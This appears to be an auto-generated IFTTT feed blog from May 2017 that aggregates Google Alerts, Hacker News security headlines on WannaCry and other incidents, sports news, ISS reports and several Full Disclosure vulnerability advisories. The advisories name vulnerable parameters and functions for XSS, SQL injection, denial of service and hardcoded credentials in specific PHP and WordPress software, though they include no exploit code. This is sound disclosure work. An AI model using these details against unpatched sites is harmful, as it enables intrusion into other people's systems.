Change the email on your existing account via your profile settings. anonymous. Joined 2 years ago · last seen in the past day. competitions novice.
from Google Alert - anonymous http://ift.tt/2rdZiSE
via IFTTT
Latest YouTube Video
Saturday, May 13, 2017
WannaCry Ransomware: It’s Not Over, Better Get Prepared for Next Wave of Attacks
If you are following the news, by now you might be aware that a security researcher has activated a "Kill Switch" to stop WannaCry ransomware from spreading further, which has already infected over 170,000 computers across 99 countries worldwide only in past two days. For those unaware, WannaCry is an insanely fast-spreading ransomware malware that leverages a Windows SMB exploit to target a
from The Hacker News http://ift.tt/2rdxE8e
via IFTTT
from The Hacker News http://ift.tt/2rdxE8e
via IFTTT
Improve Anonymous Surveys to Make them fully Anonymous
One of our faculty noticed that surveys in Canvas can't be officially anonymous. Students need to know that their feedback is actually anonymous for.
from Google Alert - anonymous http://ift.tt/2rcZ9Pf
via IFTTT
from Google Alert - anonymous http://ift.tt/2rcZ9Pf
via IFTTT
Ravens: Money appears to be keeping Nick Mangold from joining team; both sides believed to still be interested - Jamison Hensley (ESPN)
from ESPN http://ift.tt/17lH5T2
via IFTTT
via IFTTT
I have a new follower on Twitter
UXscoops
We love to help #tech #authors #developers #amwriting #selfpublishing at better Twitter and social media marketing
Worldwide
https://t.co/cuamjUOLHh
Following: 9702 - Followers: 11634
May 13, 2017 at 08:05AM via Twitter http://twitter.com/UXscoops
Proxy list anonymous l1
We provide http and https(SSL) proxies. We have the best free proxies list.. 186.103.239.190, 80, High Anonymous Proxy. HTTP, Chile, Santiago ...
from Google Alert - anonymous http://ift.tt/2pva4GI
via IFTTT
from Google Alert - anonymous http://ift.tt/2pva4GI
via IFTTT
(eBook 13.05.2017) Author Anonymous by EK Blair torrents Download Free
Author Anonymous by E.K. Blair torrents Download Free DOWNLOAD eBook Author Anonymous by E.K. Blair for iphone,kindle,android,i... - Dutch ...
from Google Alert - anonymous http://ift.tt/2puVBL4
via IFTTT
from Google Alert - anonymous http://ift.tt/2puVBL4
via IFTTT
I have a new follower on Twitter
Domain105
IT Architect, photographer, parent and all round nice guy.
West Midlands, England
https://t.co/IDyXR4Qx9w
Following: 3036 - Followers: 2250
May 13, 2017 at 05:45AM via Twitter http://twitter.com/Domain105
Protect Against WannaCry: Microsoft Issues Patch for Unsupported Windows (XP, Vista, 8,...)
In the wake of the largest ransomware attack in the history that had already infected over 114,000 Windows systems worldwide since last 24 hours, Microsoft just took an unusual step to protect its customers with out-of-date computers. Microsoft has just released an emergency security patch update for all its unsupported version of Windows, including Windows XP, Vista, Windows 8, Server 2003
from The Hacker News http://ift.tt/2raVRvf
via IFTTT
from The Hacker News http://ift.tt/2raVRvf
via IFTTT
I have a new follower on Twitter
Arijana Ramic
I tell jokes and am an office manager for @Socedo. Tweets in English, Bosnian, and Spanish.
Following: 22257 - Followers: 22957
May 13, 2017 at 04:00AM via Twitter http://twitter.com/ArijanaRamic
Anonymous - Managers
Anonymous - Managers – Boston Restaurant Jobs - BostonChefs.com's Industry Insider, the best jobs at Boston restaurants.
from Google Alert - anonymous http://ift.tt/2rb0JjO
via IFTTT
from Google Alert - anonymous http://ift.tt/2rb0JjO
via IFTTT
Planet Aurora
What bizarre alien planet is this? It's planet Earth of course, seen from the International Space Station through the shimmering glow of aurorae. About 400 kilometers (250 miles) above Earth, the orbiting station is itself within the upper realm of the auroral displays. Aurorae have the signature colors of excited molecules and atoms at the low densities found at extreme altitudes. Emission from atomic oxygen dominates this view. The eerie glow is green at lower altitudes, but a rarer reddish band extends above the space station's horizon. Also visible from the planet's surface, this auroral display began during a geomagnetic storm. The storm was triggered after a coronal mass ejection impacted Earth's magnetosphere in June of 2015. via NASA http://ift.tt/2pGaiXL
Friday, May 12, 2017
The Shakespeare Tarot Key
Buy The Shakespeare Tarot Key book by author Anonymous. Preview and learn more about this self-published Literature & Fiction book.
from Google Alert - anonymous http://ift.tt/2pHO5IF
via IFTTT
from Google Alert - anonymous http://ift.tt/2pHO5IF
via IFTTT
Anonymous donor treats Food for Lane County volunteers to dinner
EUGENE, Ore -- Food for Lane County has been a part of the Eugene community since 1984. For the past 12 years, the organization has had a dining ...
from Google Alert - anonymous http://ift.tt/2qC1upQ
via IFTTT
from Google Alert - anonymous http://ift.tt/2qC1upQ
via IFTTT
Stored Credentials being reset to Anonymous
I have mulitple data sources configured in my web service. They are all different endpoints, but the same logic. I use an OData connection to connect.
from Google Alert - anonymous http://ift.tt/2rba8sn
via IFTTT
from Google Alert - anonymous http://ift.tt/2rba8sn
via IFTTT
Orioles: Adam Jones donates $20K to Negro Leagues Baseball Museum, plans to visit and speak with museum president on Saturday (ESPN)
from ESPN http://ift.tt/1eW1vUH
via IFTTT
via IFTTT
Massive Ransomware Attack That's Hitting World Right Now Uses NSA's Exploit
Earlier today, a massive ransomware campaign hit computer systems of hundreds of private companies and public organizations across the globe – which is believed to be the most massive ransomware delivery campaign to date. The Ransomware in question has been identified as a variant of ransomware known as WannaCry (also known as 'Wana Decrypt0r,' 'WannaCryptor' or 'WCRY'). Like other nasty
from The Hacker News http://ift.tt/2r96yhZ
via IFTTT
from The Hacker News http://ift.tt/2r96yhZ
via IFTTT
Former Browns and Ravens WR Michael Jackson, 48, dies in motorcycle accident; played eight seasons in NFL (ESPN)
from ESPN http://ift.tt/17lH5T2
via IFTTT
via IFTTT
Anonymous donors will match up to $80000!
We're excited to share that an anonymous group of caring donors is promising to match every gift we receive by June 9th – dollar for dollar – up to ...
from Google Alert - anonymous http://ift.tt/2ptplbn
via IFTTT
from Google Alert - anonymous http://ift.tt/2ptplbn
via IFTTT
Botnet Sending 5 Million Emails Per Hour to Spread Jaff Ransomware
A massive malicious email campaign that stems from the Necurs botnet is spreading a new ransomware at the rate of 5 million emails per hour and hitting computers across the globe. Dubbed "Jaff," the new file-encrypting ransomware is very similar to the infamous Locky ransomware in many ways, but it is demanding 1.79 Bitcoins (approx $3,150), which much higher than Locky, to unlock the
from The Hacker News http://ift.tt/2pt1fxg
via IFTTT
from The Hacker News http://ift.tt/2pt1fxg
via IFTTT
SportsCenter Video: Seahawks, Cardinals and Ravens are possible landing spots for Colin Kaepernick - Herm Edwards (ESPN)
from ESPN http://ift.tt/17lH5T2
via IFTTT
via IFTTT
Servants Anonymous book sale offers magic of written word
Darlene Nemeth, Marj Challand, and Pat LaTouche have each contributed more than a decade of volunteering for the Servants Anonymous Society ...
from Google Alert - anonymous http://ift.tt/2qao9Il
via IFTTT
from Google Alert - anonymous http://ift.tt/2qao9Il
via IFTTT
Anonymous Jobs
Look at Anonymous profile and browse the latest full & part-time jobs and vacancies in the UK - 301187 - CV-Library.
from Google Alert - anonymous http://ift.tt/2pFtNyP
via IFTTT
from Google Alert - anonymous http://ift.tt/2pFtNyP
via IFTTT
ISS Daily Summary Report – 5/11/2017
OsteoOmics: The crew changed BioCell media in BioCell Habitat 4. The media in all four of the habitats are changed in this second of four weeks of OsteoOmics operations. Crewmembers experience bone loss in orbit, stemming from the lack of gravity acting on their bones. OsteoOmics investigates the molecular mechanisms that dictate this bone loss by examining osteoblasts, which form bone, and osteoclasts, which dissolve bone. Improved understanding of these mechanisms could lead to more effective countermeasures to prevent bone loss during space missions and in a wide range of disorders on Earth. This may lead to better preventative care or therapeutic treatments for people suffering bone loss as a result of bone diseases like osteopenia and osteoporosis, or for patients on prolonged bed rest. Fine Motor Skills (FMS): The crew completed a series of interactive tasks during a FMS session today. The FMS investigation studies how the fine motor skills are effected by long-term microgravity exposure, different phases of microgravity adaptation, and sensorimotor recovery after returning to Earth gravity. The goal of the investigation is to determine how fine motor performance in microgravity trends/varies over the duration of a six-month and year-long space mission; how fine motor performance on orbit compare with that of a closely matched participant on Earth; and how performance trends/varies before and after gravitational transitions, including periods of early flight adaptation and very early/near immediate post-flight periods. Extravehicular Activity (EVA) Preparations: In preparation for tomorrow’s planned EXPRESS Pallet Controller Assembly (ExPCA) EVA, the crew verified tools are configured properly and that batteries are installed in Pistol Grip Tools and cameras. They also performed a final procedures review and conference with ground teams followed by final Equipment Lock preparation. Egress is scheduled tomorrow at 7:10AM CDT. Today’s Planned Activities All activities were completed unless otherwise noted. MARES battery discharge process initiation Personal Data Prep for Return ISS Food Intake Tracker – Screenshot Captures IMS Delta file prep URAGAN. Observation and photography EKON-M. Observations and photography OsteoOmics MELFI Removal Health Maintenance System (HMS) Periodic Health Status (PHS) Pre EVA Examination Filling (separation) of ЕДВ (КОВ) for Elektron or ЕДВ-СВ Fine Motor Skills Experiment Test – Subject MARES knee configuration deinstallation Health Maintenance System (HMS) Pre-EVA Periodic Health Status Examination – Stow S/G2 MRM2 Comm Config Equipment gathering for Orlan-ISS No.5 Ops Combustion Integrated Rack Alignment Guide Install Environmental Health System (EHS) Acoustic Dosimeters – Data Transfer and Stow Orlan-ISS No.5 Elements Deinstallation ExPress Carrier Avionics Configuration Extravehicular Activity (EVA) Tool Configuring MARES battery discharge status control Comm reconfig for nominal ops Extravehicular Activity (EVA) iPad Contingency Procedures preparation OsteoOmics MELFI/MERLIN Transfer Nikon still camera sync with station time Download Pille Dosimeter Readings Extravehicular Activity (EVA) Tool Audit SARCOLAB. MARES files transfer verification and shutdown OsteoOmics Media Relocate Pille Sensor prep for USOS EVA Extravehicular Activity (EVA) Procedure Review SARCOLAB. PEMS and EMG final stowage SARCOLAB. EPM Laptop relocation for files downlink preparation MSPR GCM Component Deactivation [Deferred] OsteoOmics Media Change Recharging Soyuz 733 Samsung PC Battery (if charge level is below 80%) MARES disconnection and stowage Казбек Fit Check Robotic Workstation (RWS) Setup PILOT-T. Preparation for the experiment Health Maintenance System (HMS) Food Frequency Questionnaire (FFQ) or ISS Food Intake Tracker (ISS FIT) SSC DOUG Setup for EVA MARES stowage assistance PILOT-T. Experiment Ops KASKAD. Manual mixing RWS Video Checkout Extravehicular Activity (EVA) Procedure Conference PILOT-Т. Closeout Evening Preparation Work Equipment Lock (E-LK) Preparation LAB BelAir Wireless Access Point (WAP) Verification MARES-EPM Hard Disk removal and stowage Cabin restow after MARES Closure of SM window shutters 6, 8, 9, 12, 13, 14 Completed Task List Items Veg03 Plant Water/Photo Ground Activities All activities were completed unless otherwise noted. EVA procedures conference MSS power up Three-Day Look Ahead: Friday, 05/12: ExPCA EVA #42 Saturday, 05/13: Water dispensing for Electrowetting Drawer, Skinsuit height measurement, EVA camera disassembly/Airlock deconfig/debrief Sunday, 05/14: Crew off duty, Fluid Shifts hardware gather, Ultrasound setup in Russian Segment QUICK ISS Status – Environmental Control Group: Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off [СКВ] 2 – SM Air Conditioner System (“SKV2”) On Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Operate Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) Process Trace Contaminant Control System (TCCS) Lab Full up Trace Contaminant Control System (TCCS) Node 3 Off
from ISS On-Orbit Status Report http://ift.tt/2r9nvJA
via IFTTT
from ISS On-Orbit Status Report http://ift.tt/2r9nvJA
via IFTTT
django-custom-anonymous 0.2
django-custom-anonymous 0.2. Download django-custom-anonymous-0.2.tar.gz. Library provides customization of AnonymousUser in Django.
from Google Alert - anonymous http://ift.tt/2r99prO
via IFTTT
from Google Alert - anonymous http://ift.tt/2r99prO
via IFTTT
Learn to Code: Get 10 Best Online Training Courses for Just $49 (Limited-Time 95% OFF)
Struggling to learn how to code? If you’re looking to 'learn how to code' and seeking a career as an expert-level programmer, you should know how to play with codes and make your own. It's no secret that mastering a coding language or two can put you at the top of the job market – thanks to the boom in technology. Today, you can elevate your programming skills straight from the Internet to
from The Hacker News http://ift.tt/2pFrqwJ
via IFTTT
from The Hacker News http://ift.tt/2pFrqwJ
via IFTTT
Microsoft Brings Ubuntu, Suse, and Fedora Linux to Windows Store
Microsoft has been expressing its love for Linux and Open Source for almost three years now, and this love is embracing as time passes. Just last year, Microsoft made headlines by building support for the Bash shell and Ubuntu Linux binaries into Windows 10, allowing users to run limited instances of Linux directly on top of the OS without installing any virtual machine, as well as developers
from The Hacker News http://ift.tt/2pFaeXs
via IFTTT
from The Hacker News http://ift.tt/2pFaeXs
via IFTTT
Forget Anonymous Sources, Trump's Lies Stand Above All
The mainstream media (and by extension, commentators, and commentary websites) got burned over the last several days on anonymously sourced ...
from Google Alert - anonymous http://ift.tt/2pFyae3
via IFTTT
from Google Alert - anonymous http://ift.tt/2pFyae3
via IFTTT
[InsideNothing] Web Development liked your post "[InsideNothing] hitebook.net liked your post "[FD] Kajona 4.7: XSS & Directory Traversal""
|
Source: Gmail -> IFTTT-> Blogger
Unpatched 0-Days in Vanilla Forums Let Remote Attackers Hack Websites
A security researcher has publicly disclosed two critical zero-day vulnerabilities in Vanilla Forums, an open source software that powers discussion on over 500,000 websites, which could allow unauthenticated, remote attackers to fully compromise targeted websites easily. Discovered by Polish security researcher Dawid Golunski of Legal Hackers, two separate unpatched vulnerabilities, a remote
from The Hacker News http://ift.tt/2r0uQhz
via IFTTT
from The Hacker News http://ift.tt/2r0uQhz
via IFTTT
M13: The Great Globular Cluster in Hercules
In 1716, English astronomer Edmond Halley noted, "This is but a little Patch, but it shews itself to the naked Eye, when the Sky is serene and the Moon absent." Of course, M13 is now less modestly recognized as the Great Globular Cluster in Hercules, one of the brightest globular star clusters in the northern sky. Telescopic views reveal the spectacular cluster's hundreds of thousands of stars. At a distance of 25,000 light-years, the cluster stars crowd into a region 150 light-years in diameter. Approaching the cluster core upwards of 100 stars could be contained in a cube just 3 light-years on a side. For comparison, the closest star to the Sun is over 4 light-years away. Along with the cluster's dense core, the outer reaches of M13 are highlighted in this sharp color image. The cluster's evolved red and blue giant stars show up in yellowish and blue tints. via NASA http://ift.tt/2qVE9iG
Thursday, May 11, 2017
I have a new follower on Twitter
toastate
#Serverless applications are about to move forward to the next step !
https://t.co/kZvEHjWmFg
Following: 5001 - Followers: 3448
May 11, 2017 at 11:55PM via Twitter http://twitter.com/toastate
Views page not accessible by anonymous users
Individual articles are still accessible by anonymous users, so it appears to be an issue with this views page. I have other views which create blocks ...
from Google Alert - anonymous http://ift.tt/2qZZvvw
via IFTTT
from Google Alert - anonymous http://ift.tt/2qZZvvw
via IFTTT
Français (France)
Nowadays, Fast food is the preferred choice, but how safe is this food? Sometimes does the industry cut out corners just to make a quick buck, and ...
from Google Alert - anonymous http://ift.tt/2r6dbkN
via IFTTT
from Google Alert - anonymous http://ift.tt/2r6dbkN
via IFTTT
Français (France)
One man was so sick of high electricity prices he has created his own way of making constant hot water – without the need for electricity.
from Google Alert - anonymous http://ift.tt/2q7sGvx
via IFTTT
from Google Alert - anonymous http://ift.tt/2q7sGvx
via IFTTT
Narcotics Anonymous will hold campout
ALBION— A Narcotics Anonymous campout will be held Friday, June 23 through Sunday, June 25, at Chain O' Lakes State Park, 2533 E. C.R. 75S, ...
from Google Alert - anonymous http://ift.tt/2r7hbT1
via IFTTT
from Google Alert - anonymous http://ift.tt/2r7hbT1
via IFTTT
All OnePlus Devices Vulnerable to Remote Attacks Due to 4 Unpatched Flaws
There is a really bad news for all OnePlus lovers. A security researcher has discovered four vulnerabilities that affect all OnePlus handsets, including One, X, 2, 3 and 3T, running the latest versions of OxygenOS 4.1.3 (worldwide) and below, as well as HydrogenOS 3.0 and below (for Chinese users). One of the unpatched vulnerabilities allows Man-in-the-Middle (MitM) attack against OnePlus
from The Hacker News http://ift.tt/2qxiuxI
via IFTTT
from The Hacker News http://ift.tt/2qxiuxI
via IFTTT
The Anonymous Noise Season 1 Episode 5
1 Episode 5 ) online HD. The Anonymous Noise Season 1 Episode 5 Watch Episode. Stream. CLICK LINK >>> The Anonymous Noise Season 1.
from Google Alert - anonymous http://ift.tt/2r58aZT
via IFTTT
from Google Alert - anonymous http://ift.tt/2r58aZT
via IFTTT
Three Chinese Hackers Fined $9 Million for Stealing Trade Secrets
Hackers won't be spared. Three Chinese hackers have been ordered to pay $8.8 million (£6.8 million) after hacking email servers of two major New York-based law firms to steal corporate merger plans in December 2016 and used them to trade stocks. The U.S. District Judge Valerie Caproni in Manhattan sued 26-year-old Iat Hong, 30-year-old Bo Zheng, and 50-year-old Hung Chin, over a multi-million
from The Hacker News http://ift.tt/2pp06a8
via IFTTT
from The Hacker News http://ift.tt/2pp06a8
via IFTTT
“Anonymous” hacking group says to prepare for World War 3
The shadowy hacking group “Anonymous” just dropped a bomb, figuratively speaking, on the planet with an equally cryptic warning: We should all be ...
from Google Alert - anonymous http://ift.tt/2pC9SAQ
via IFTTT
from Google Alert - anonymous http://ift.tt/2pC9SAQ
via IFTTT
Beware! Built-in Keylogger Discovered In Several HP Laptops
Do you own a Hewlett-Packard (HP) laptop? Yes? Just stop whatever you are doing and listen carefully: Your HP laptop may be silently recording everything you are typing on your keyboard. While examining Windows Active Domain infrastructures, security researchers from the Switzerland-based security firm Modzero have discovered a built-in keylogger in an HP audio driver that spy on your all
from The Hacker News http://ift.tt/2q6cGtL
via IFTTT
from The Hacker News http://ift.tt/2q6cGtL
via IFTTT
ISS Daily Summary Report – 5/10/2017
OsteoOmics: The crew changed BioCell media in BioCell Habitat 3. The media in all four of the habitats will be changed in this second of four weeks of OsteoOmics operations. Crewmembers experience bone loss in orbit, stemming from the lack of gravity acting on their bones. OsteoOmics investigates the molecular mechanisms that dictate this bone loss by examining osteoblasts, which form bone, and osteoclasts, which dissolve bone. Improved understanding of these mechanisms could lead to more effective countermeasures to prevent bone loss during space missions and in a wide range of disorders on Earth. This may lead to better preventative care or therapeutic treatments for people suffering bone loss as a result of bone diseases like osteopenia and osteoporosis, or for patients on prolonged bed rest. Myotendinous and Neuromuscular Adaptation to Long-term Spaceflight (Sarcolab)-3: Today’s second operational day for the Sarcolab-3 experiment began with converting the Muscle Atrophy Research & Exercise System (MARES) from the ankle measurement configuration to the knee measurement configuration. Subject donned the Percutaneous Electrical Muscle Stimulator (PEMS) and Electromyography (EMG) electrodes to stimulate and measure calf muscle and tendon response at the back of the knee (calf muscle origin). During the knee joint evaluation, the subject sat on the MARES dynamometer with the chair and pantograph set to obtain knee flexion and extension from a 90 degree knee angle to full extension with the knee torque adapter securely fixed to the shin. The inflight data will be compared to preflight and post flight measurements to measure the impact of a hypothesized microgravity induced muscle loss. Sarcolab investigates the adaptation and deterioration of the soleus, or calf muscle, where it joins the Achilles tendon which links it to the heel and carries loads from the entire body. Muscle fiber samples are taken from crew members before and after flight, and analyzed for changes in structural and chemical properties. MRI and ultrasound tests and electrode stimulation are conducted to help assess muscle and tendon changes caused by microgravity exposure. Phase Change Heat Exchanger (PCHx): The crew removed the Wax Tray from the PCHx and stowed it for return on SpaceX 11. The objective of the PCHx Project is to create a unique test platform to advance the technology readiness level of phase change heat exchangers for infusion into future exploration vehicles. Phase change material heat exchangers are a useful technology that helps certain space missions in regulating the thermal conditions on their particular spacecraft. They serve as a supplemental heat rejection device during time-varying heat loads and/or transient environments. It does so by storing waste energy by melting a phase change material during peak loads. It can then reject this energy through a radiator when conditions allow, causing the phase change material to freeze. European Space Agency (ESA) Active Dosimeter Swap: The crew retrieved dosimeters worn by crewmembers and deployed them in the Columbus module, Node 3 and the Service Module. The European Crew Personal Active Dosimeter is worn by European ISS crewmembers on orbit to measure radiation exposure. This device, coupled with other dosimeters in the Columbus Laboratory, provides radiation dosage information that can be used to support risk assessment and dose management. The goal is to enable the verification of radiation monitoring systems for future medical monitoring of crewmembers in space. Extravehicular Activity (EVA) Preparations: The crew completed the following in preparation for Friday’s planned EXPRESS Pallet Controller Assembly (ExPCA) EVA. Detailed timeline and procedures review Briefing package review Tool configuration summary review Added EVA specific pages to the cuff checklist On-Board Training (OBT) Emergency Response: All crew members participated in a rapid depress emergency scenario and completed the following objectives: Practiced ISS emergency response with crew and ground roles based on information provided by simulator displays. Physically translated through the ISS to appropriate response locations to visualize use of ISS equipment and interfaces. Practiced procedure execution and associated decision making based on cues provided by the simulator. Practiced communication and coordination with Mission Control Center (MCC)-Houston and MCC-Moscow as required for a given emergency scenario. Mobile Servicing System (MSS) Operations: Yesterday afternoon, Robotics Ground Controllers powered up the MSS, configured and stowed the Special Purpose Dexterous Manipulator (SPDM) on Mobile Base System (MBS) Power Data Grapple Fixture 2 (PDGF2) using the Space Station Robotic Manipulator System (SSRMS). After stowing the SPDM, Controllers translated the Mobile Transporter from Worksite 3 (WS3) to WS4 and maneuvered the SSRMS into config for Friday’s ExPCA EVA. Today’s Planned Activities All activities were completed unless otherwise noted. Personal Data Prep for Return IMS Delta file prep EKON-M. Observations and photography Environmental Health System (EHS) Acoustic Dosimeter Operations – Setup Dosimeter for Static Measurement EVA Procedure Review OsteoOmics Media Relocate Water Transfer from Progress 435 (DC1) H2O Tank 2 to ЕДВ and H2O Tank 2 Bladder Compression Recharging Soyuz 735 Samsung PC Battery (if charge level is below 80%) Phase Change HX Circuit Breaker OFF SARCOLAB. MARES knee configuration installation MARES Knee Shaving Preparation Wax Tray Remove CONSTANTA-2. Cassette removal from ТБУ-В and setup on panel for 1-hour warmup EMG electrodes installation and Sarcolab knee protocol execution SARCOLAB MARES subject electrodes equipment assistance RGN Wastewater Storage Tank Assembly (WSTA) Fill OsteoOmics Media Change CONSTANTA-2. Preparation and Execution 5 Electro-Wetting Drawer Install 1 Google Photo Transfer [Failed] VIZIR. Preparation Steps Combustion Integrated Rack Alignment Guide Removal Habitability Narrated Task Video Setup – Subject Training for Emergency Response On-board ISS Extravehicular Mobility Unit (EMU) Cuff Checklist Print Habitability Narrated Task Video End – Subject Private Psychological Conference (PPC) VIZIR. Closeout Ops Electro-Wetting Drawer Install 2 Initiate water transfer from CWC-I to ЕДВ Glacier Sample Remove EVA Pen and Ink Update ECCO MELFI insert [Deferred] NanoRacks Module-55 Gear-Sample Swap CASKAD. Manual Mixing in Bioreactor Verification of ИП-1 Flow Sensor Position For Mini ESA Thermal Container NanoRacks Keyboard Troubleshooting Terminate Soyuz 735 Samsung PC Battery Charge (as necessary) On-board Training (OBT) ISS Emergency Drill Conference Terminate water transfer from CWC-I to ЕДВ Environmental Health System (EHS) – Formaldehyde Monitoring Kit (FMK) Stow Operation VIZIR. Download […]
from ISS On-Orbit Status Report http://ift.tt/2r44I1O
via IFTTT
from ISS On-Orbit Status Report http://ift.tt/2r44I1O
via IFTTT
[FD] DefenseCode ThunderScan SAST Advisory: GOOGLE google-api-php-client Multiple Security Vulnerabilities
DefenseCode ThunderScan SAST Advisory GOOGLE google-api-php-client Multiple Security Vulnerabilities Advisory ID: DC-2017-04-012 Advisory Title: google-api-php-client Multiple XSS Vulnerabilities Advisory URL: http://ift.tt/2pASUCR Software: google-api-php-client Software Language: PHP Version: 2.1.3 and below Vendor Status: Vendor contacted, vulnerability confirmed Release Date: 2017-05-10 Risk: Medium 1. General Overview =================== During the security audit of google-api-php-client (Google's PHP client library for accessing Google APIs) multiple XSS vulnerabilities were discovered using DefenseCode ThunderScan SAST application source code security analysis platform. More information about ThunderScan SAST is available at URL: http://ift.tt/Vn2J4r 2. Software Overview ==================== According to the API developers, the Google API Client Library enables you to work with Google APIs such as Google+, Drive, or YouTube on your server. The developers further noted: "This client library is in beta. We will make an effort to support the library and maintain backwards compatibility in the future, but we reserve the right to make incompatible changes when necessary." Homepage: http://ift.tt/ZIdowR http://ift.tt/1aHqxFd 3. Brief Vulnerability Description ================================== During the security analysis, ThunderScan SAST discovered Cross Site Scripting vulnerability in Google's PHP client library for accessing Google APIs (google-api-php-client). The vulnerabilities were found in the sample code for using the Google's URL Shortener. The Cross-Site Scripting vulnerability can enable the attacker to construct the URL that contains malicious JavaScript code. If the administrator of the site makes a request to such an URL, the attacker's code will be executed, with unrestricted access to the site in question. The attacker can entice the administrator to visit the URL in various ways, including sending the URL by email, posting it as a part of the comment on the vulnerable site or another forum. Once the unsuspecting user has visited such an URL, the attacker can proceed to send requests to the API on the behalf of the victim from his JavaScript. 3.1. Cross-Site Scripting Vulnerable Function:
Variable: $_SERVER['PHP_SELF'] Vulnerable URL: http://ift.tt/2po72nZ File: google-api-php-client\examples\url-shortener.php
Source: Gmail -> IFTTT-> Blogger
Source: Gmail -> IFTTT-> Blogger
[FD] DefenseCode WebScanner DAST Advisory: WordPress User Access Manager Plugin Security Vulnerability
DefenseCode WebScanner DAST Advisory WordPress User Access Manager Plugin Security Vulnerability Advisory ID: DC-2017-01-021 Advisory Title: WordPress User Access Manager Plugin Cross Site Scripting vulnerability Advisory URL: http://ift.tt/2r4RhPN Software: WordPress User Access Manager Software Language: PHP Version: 1.2.14 and below Vendor Status: Vendor contacted, vulnerability fixed Release Date: 20170510 Risk: Medium 1. General Overview =================== During the security audit of User Access Manager plugin for WordPress CMS, Cross Site Scripting vulnerability was discovered using DefenseCode WebScanner application security analysis platform. More information about WebScanner is available at URL: http://ift.tt/Vn2J4r 2. Software Overview =================== According to the developers, User Access Manager plugin can be used to manage the access to your posts, pages, categories and files. It has more than 40,000 downloads on wordpress.org. Homepage: http://ift.tt/1yendO2 3. Brief Vulnerability Description ================================== During the security analysis, WebScanner discovered Cross-Site Scripting vulnerability in User Access Manager Plugin. The Cross-Site Scripting vulnerability can enable the attacker to construct the URL that contains malicious JavaScript code. If the administrator of the site makes a request to such an URL, the attacker's code will be executed, with unrestricted access to the WordPress site in question. The attacker can entice the administrator to visit the URL in various ways, including sending the URL by email, posting it as a part of the comment on the vulnerable site or another forum. Due to missing nonce token the vulnerability is also directly exposed to other, indirect, attack vectors. 3.1. Cross-Site Scripting Function: echo() Variable: $_GET['id'] Vulnerable URL: http://ift.tt/2r53HXM File: user-access-manager\tpl\adminGroup.php
Source: Gmail -> IFTTT-> Blogger
Source: Gmail -> IFTTT-> Blogger
[FD] trashbilling.com and Trashflow 3.0.0 Multiple Issues
A blog post with information located here: http://ift.tt/2pmPEQd ============ Introduction ============ This was a basic vulnerability analysis of trashbilling.com (which I am required to use to pay my trash bill), and Trashflow 3.0, which updates trashbilling.com from the Trash Hauler side. My disclosure intent was to force Ivy Computers Inc to re-assess their security posture as it was severely lacking. This is a full disclosure following their 90 day remediation period. ============ List Summary ============ trashbilling.com: -Account enumeration/PII Leak [major]: trashbilling.com uses client side identification without a password to access billing software, revealing names/email/address/phone as well as partial CC data. >This client side validation is unobfuscated javascript -SQLI [major]- vulnerability contained in CC update field, giving access to billing database, on any user -XSS [minor]- vulnerability in email update field -DOS [minor]- no restriction on setting another user's password, could block all users from accessing their data Trashflow 3.0: -Hardcoded credentials [medium]- FTP hardcoded credentials available in plaintext during backup and update software operations -Hardcoded credentials [medium]- Software billing credentials hardcoded in helper binary cash_drawer_cc.exe (allows editing of user billing data) -Public Exploits [medium]- FTP servers run off vsFTPd 2.0.5, risking numerous DOS vulnerabilities
Source: Gmail -> IFTTT-> Blogger
Source: Gmail -> IFTTT-> Blogger
[FD] DefenseCode ThunderScan SAST Advisory: WordPress Tracking Code Manager Plugin Multiple Security Vulnerabilities
DefenseCode ThunderScan SAST Advisory WordPress Tracking Code Manager Plugin Multiple Security Vulnerabilities Advisory ID: DC-2017-01-020 Advisory Title: WordPress Tracking Code Manager Plugin Multiple Vulnerabilities Advisory URL: http://ift.tt/2pC6FlA Software: WordPress Tracking Code Manager Software Language: PHP Version: 1.11.1 and below Vendor Status: Vendor contacted Release Date: 2017-05-10 Risk: Medium 1. General Overview =================== During the security audit of Tracking Code Manager plugin for WordPress CMS, multiple vulnerabilities were discovered using DefenseCode ThunderScan application source code security analysis platform. More information about ThunderScan is available at URL: http://ift.tt/Vn2J4r 2. Software Overview ==================== According to the developers, Tracking Code Manager is a plugin to manage all your tracking code and conversion pixels, simply. Compatible with Facebook Ads, Google Adwords, WooCommerce, Easy Digital Downloads, WP eCommerce. It has more than 40,000 downloads on wordpress.org. Homepage: http://ift.tt/1y7dL4e 3. Brief Vulnerability Description ================================== During the security analysis, ThunderScan discovered Cross-Site Scripting and remote Denial of Service vulnerabilities in Tracking Code Manager plugin. Denial of Service requires only one visit to a specific URL and whole WordPress becomes completely unresponsive until restart. DoS is based upon the ability of the user to select and call a function of it's choice (while safisfying specific conditions). By making a recursive call to the function that handles the request (tcmp_do_action()) DoS can easily be accomplished. Both vulnerabilities can be found in the settings section of the plugin, and can be remotely triggered due to missing nonce token and validation. Since the DoS vulnerability relies on GET requests, is missing the nonce token, the vulnerability is also directly exposed to attack vectors such as Cross Site request forgery (CSRF). DoS vulnerability was confirmed on windows OS. 3.1 Cross-Site Scripting URL Parameter: tcmp_action Vulnerable URL: http://ift.tt/2r3rzug3.2. Denial of Service Function: tcmp_do_action() Vulnerable URL: http://ift.tt/2pnomcC 4. Solution =========== Vendor should resolve the security issues in next release. All users are strongly advised to update WordPress Tracking Code Manager plugin to the latest available version as soon as the vendor releases an update. 5. Credits ========== Discovered with DefenseCode ThunderScan Source Code Security Analyzer by Neven Biruski 6. Disclosure Timeline ====================== 04/04/2017 Vendor contacted 07/04/2017 Vendor responded: "We will fix it in the next update" 10/05/2017 Advisory released to the public 7. About DefenseCode ==================== DefenseCode L.L.C. delivers products and services designed to analyze and test web, desktop and mobile applications for security vulnerabilities. DefenseCode ThunderScan is a SAST (Static Application Security Testing, WhiteBox Testing) solution for performing extensive security audits of application source code. ThunderScan SAST performs fast and accurate analyses of large and complex source code projects delivering precise results and low false positive rate. DefenseCode WebScanner is a DAST (Dynamic Application Security Testing, BlackBox Testing) solution for comprehensive security audits of active web applications. WebScanner will test a website's security by carrying out a large number of attacks using the most advanced techniques, just as a real attacker would. Subscribe for free software trial on our website http://ift.tt/Vn2J4r E-mail: defensecode[at]defensecode.com Website: http://ift.tt/Vn2J4r Twitter: https://twitter.com/DefenseCode/
